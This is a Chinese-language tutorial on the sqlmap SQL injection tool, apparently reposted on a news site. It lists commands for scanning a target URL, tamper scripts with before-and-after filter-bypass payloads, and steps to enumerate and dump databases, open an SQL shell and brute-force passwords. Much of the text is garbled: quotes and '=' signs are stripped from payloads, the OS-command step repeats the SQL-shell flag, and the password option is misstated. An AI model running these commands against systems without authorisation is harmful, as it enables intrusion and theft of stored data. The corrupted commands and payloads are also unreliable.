FEATURED · 精选文章

SQLMAP基本用法

发布时间 / 2026/8/19 23:25:50
来源 / 创域科博编辑部
栏目 / 资讯中心
SQLMAP基本用法 自动化SQL注入工具扫描、发现并利用URL的SQL注入漏洞内置绕过插件支持众多数据库采取布尔类型盲注、时间盲注、报错注入、联合查询注入和堆查询注入5种SQL注入技术。1.判断是否存在注入在sqlmap.py所在文件夹下CtrlL,然后输入powershell.exe打开命令行输入命令python sqlmap.py -u 扫描网站的url若想省略用户输入部分执行默认操作可用到–batch参数python sqlmap.py -u 扫描网站的url --batch若想重新测试该目标URL时可以使用–-flush-session清除当前目标的会话文件python sqlmap.py -u 扫描网站的url --flush-session若已知使用的数据库版本可以使用–dbms指定数据库版本优化查询时间python sqlmap.py -u 扫描网站的url --dbms数据库版本名称若想提示payload等级可以使用–level参数指定payload等级python sqlmap.py -u 扫描网站的url --level 数字1~5若想随机指定请求头部的User-Agent可以使用–random-agent参数sqlmap默认使用sqlmap/1.0-dev-xxxxxxx ([http://sqlmap.org](http://sqlmap.org))作为User-Agent执行HTTP请求若想指定请求头部的User-Agent,可以使用–user-agent参数python sqlmap.py -u 扫描网站的url --random-agent python sqlmap.py -u 扫描网站的url --user-agent自定义User-Agent若想指定注入方式可以使用–technique参数注入类型对应的参数B基于布尔的盲注E基于错误U基于联合查询S堆叠查询T基于时间的盲注Q内联查询python sqlmap.py -u 扫描网站的url --technique注入类型选项可多种组合若想查看输出信息的详细程度可以使用-v参数共有七个级别的详细程度0仅显示 Python 回溯、错误和严重消息。1还显示信息和警告消息。2还显示调试消息。3还显示注入的负载。4还显示 HTTP 请求。5还显示 HTTP 响应的头部。6还显示 HTTP 响应的页面内容。python sqlmap.py-u扫描网站的url-v 等级若想绕过过滤函数进行渗透攻击可以使用–tamper参数python sqlmap.py -u 扫描网站的url --tamper 脚本路径1脚本路径2...常用tamper脚本1apostrophemask.py作用将引号替换为UTF-8用于过滤单引号1AND11#用前1AND%EF%BC%871%EF%BC%87%EF%BC%871#用后2base64encode.py作用替换为base64编码1 AND SLEEP(5)# #用前MScgQU5EIFNMRUVQKDUpIw#用后3multiplespaces.py作用围绕SQL关键字添加多个空格1UNION SELECT foobar#用前1UNION SELECT foobar#用后4space2plus.py作用用替换空格SELECTidFROM users#用前SELECTidFROMusers#用后5nonrecursivereplacement.py作用作为双重查询语句用双重语句替代预定义的SQL关键字1UNION SELECT2--#用前1UNIUNIONN SELESELECTCT2--#用后6space2randomblank.py作用将空格替换为其他有效字符SELECTidFROM users#用前SELECT%0Did%0DFROM%0Ausers#用后7unionalltounion.py作用将UNION ALL SELECT替换为UNION SELECT-1UNION ALL SELECT#用前-1UNION SELECT#用后8securesphere.py作用追加特制的字符串1AND11#用前1AND11and0having0having#用后9space2hash.py作用将空格替换为#并添加一个随机字符串和换行符1AND92779277#用前1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A92779277#用后10space2mssqlblank.py作用将空格替换为其他空符号SELECTidFROM users#用前SELECT%0Eid%0DFROM%07users#用后(11)space2mssqlhash.py作用将空格替换为#并添加一个换行符1AND92779277#用前1%23%0AAND%23%0A92779277#用后(12)between.py作用用NOT BETWEEN 0 AND替换用BETWEEN AND替换1AND AB--#用前1AND A NOT BETWEEN0AND B--#用后1AND AB--#用前1AND A BETWEEN AND B--#用后2.判断文本中的请求是否存在注入python sqlmap.py -r 扫描文本的名称3.查询当前用户下所有数据库使用–dbs参数python sqlmap.py -u 扫描网站的url --dbs4.获取数据库中表名使用-D 数据库名指定查询某数据库使用–tables查询所有表python sqlmap.py -u 扫描网站的url -D 数据库名 --tables5.获取表中字段名使用-T 表名指定查询某表使用–columns查询所有字段python sqlmap.py-u扫描网站的url-D 数据库名-T 表名--columns6.获取字段内容使用-C 列名1列名2…指定查询某列使用–dump有序排列python sqlmap.py -u 扫描网站的url -D 数据库名 -T 表名 -C 列名1列名2...... --dump7.执行sql语句python sqlmap.py-u扫描网站的url--sql-shellexit即可退出8.执行OS语句python sqlmap.py-u扫描网站的url--sql-shellexit即可退出9.爆破密码python sqlmap.py-u扫描网站的url--password
RELATED — 相关阅读

相关资讯

LATEST — 最新资讯

最新发布

TODAY — 本日精选

新闻

WEEKLY — 本周精选

新闻

MONTHLY — 本月精选

新闻